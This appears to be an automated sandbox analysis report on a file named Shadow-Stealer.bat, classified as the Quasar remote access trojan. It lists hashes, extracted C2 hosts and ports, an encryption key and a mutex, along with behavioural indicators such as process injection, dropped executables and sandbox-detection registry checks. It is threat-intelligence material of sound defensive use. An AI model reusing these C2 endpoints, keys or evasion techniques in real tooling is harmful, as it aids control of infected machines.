quasar | 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724

Analysis

max time kernel
1800s
max time network
1799s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
28-05-2024 09:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Shadow-Stealer.bat
Size

12.5MB
MD5

cf5b412ffc3ce43cd7ddce602fc67f56
SHA1

221dfcd0868158f676c472d8a5bcf9647f0c7d51
SHA256

84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
SHA512

695489d3b02863c382dc4b044bd80825b3f46eadfe4647619a0036da7ab3405b7925e89a457b19ee57995a59dcf8d5f9df237cd4d5d59a6cee3914aeaee2a8ef
SSDEEP

49152:mmlB6XvIxKx/znMtw4e/x4dA+ilmm5C5rsw1y1lkGxJW5RXLnfaWixbVoZmb0nYk:b

Score

10^/10

quasar v2.2.6 | tinsler spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.6 | Tinsler

throbbing-mountain-09011.pktriot.net:22112

167.71.56.116:22112

throbbing-mountain-09011.pktriot.net:5050

Mutex

cf16a257-7d89-4296-8384-8fca3dbb568f

Attributes

encryption_key
045F98A287DD47B8B5C074D234995A2C5A913042
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
1000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3376-66-0x000001C734A50000-0x000001C73521A000-memory.dmp	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 2088 created 2892	2088	WerFault.exe	dllhost.exe
PID 2464 created 5480	2464	WerFault.exe	dllhost.exe
PID 3064 created 5732	3064	WerFault.exe	dllhost.exe
PID 5360 created 5532	5360	WerFault.exe	dllhost.exe
PID 5328 created 6064	5328	WerFault.exe	dllhost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 15 IoCs

Processes:

Shadow-Stealer.bat.exe$sxr-powershell.exesvchost.exesvchost.exe

description	pid	process	target process
PID 5052 created 608	5052	Shadow-Stealer.bat.exe	winlogon.exe
PID 3376 created 608	3376	$sxr-powershell.exe	winlogon.exe
PID 3376 created 608	3376	$sxr-powershell.exe	winlogon.exe
PID 5052 created 608	5052	Shadow-Stealer.bat.exe	winlogon.exe
PID 5040 created 2892	5040	svchost.exe	dllhost.exe
PID 3376 created 608	3376	$sxr-powershell.exe	winlogon.exe
PID 5040 created 5480	5040	svchost.exe	dllhost.exe
PID 3376 created 608	3376	$sxr-powershell.exe	winlogon.exe
PID 3376 created 608	3376	$sxr-powershell.exe	winlogon.exe
PID 3376 created 608	3376	$sxr-powershell.exe	winlogon.exe
PID 5040 created 5732	5040	svchost.exe	dllhost.exe
PID 3376 created 608	3376	$sxr-powershell.exe	winlogon.exe
PID 5040 created 5532	5040	svchost.exe	dllhost.exe
PID 5040 created 6064	5040	svchost.exe	dllhost.exe
PID 4380 created 3732	4380	svchost.exe	backgroundTaskHost.exe

Deletes itself 1 IoCs

Processes:

Shadow-Stealer.bat.exe

pid process

5052 Shadow-Stealer.bat.exe
Executes dropped EXE 5 IoCs

Processes:

Shadow-Stealer.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

5052 Shadow-Stealer.bat.exe
4916 $sxr-mshta.exe
752 $sxr-cmd.exe
3376 $sxr-powershell.exe
4716 $sxr-powershell.exe

Drops file in System32 directory 14 IoCs

Processes:

svchost.exeOfficeClickToRun.exesvchost.exeDllHost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Suspicious use of SetThreadContext 18 IoCs

Processes:

Shadow-Stealer.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 5052 set thread context of 4804	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 set thread context of 3852	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 3376 set thread context of 3288	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 4656	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 3340	3376	$sxr-powershell.exe	dllhost.exe
PID 5052 set thread context of 3380	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 5052 set thread context of 2892	5052	Shadow-Stealer.bat.exe	dllhost.exe
PID 3376 set thread context of 6044	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 5480	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 5628	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 4968	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 5760	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 5364	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 5236	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 5732	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 5532	3376	$sxr-powershell.exe	dllhost.exe
PID 3376 set thread context of 6064	3376	$sxr-powershell.exe	dllhost.exe

Drops file in Windows directory 6 IoCs

Processes:

Shadow-Stealer.bat.exe

description	ioc	process
File created	C:\Windows\$sxr-mshta.exe	Shadow-Stealer.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	Shadow-Stealer.bat.exe
File created	C:\Windows\$sxr-cmd.exe	Shadow-Stealer.bat.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	Shadow-Stealer.bat.exe
File created	C:\Windows\$sxr-powershell.exe	Shadow-Stealer.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Shadow-Stealer.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5652	2892	WerFault.exe	dllhost.exe
3112	5480	WerFault.exe	dllhost.exe
5544	5732	WerFault.exe	dllhost.exe
4908	6064	WerFault.exe	dllhost.exe

Checks processor information in registry 2 TTPs 44 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5860 taskkill.exe

pid	process
5860	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE

Modifies data under HKEY_USERS 17 IoCs

Processes:

OfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716887099"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 09:05:00 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={57EC1572-54E1-45A8-8FEE-66D1A3BEFC90}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe

Modifies registry class 64 IoCs

Processes:

Explorer.EXERuntimeBroker.exe$sxr-mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000e0c9f43258a1da018955b7015ca1da018955b7015ca1da0114000000	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
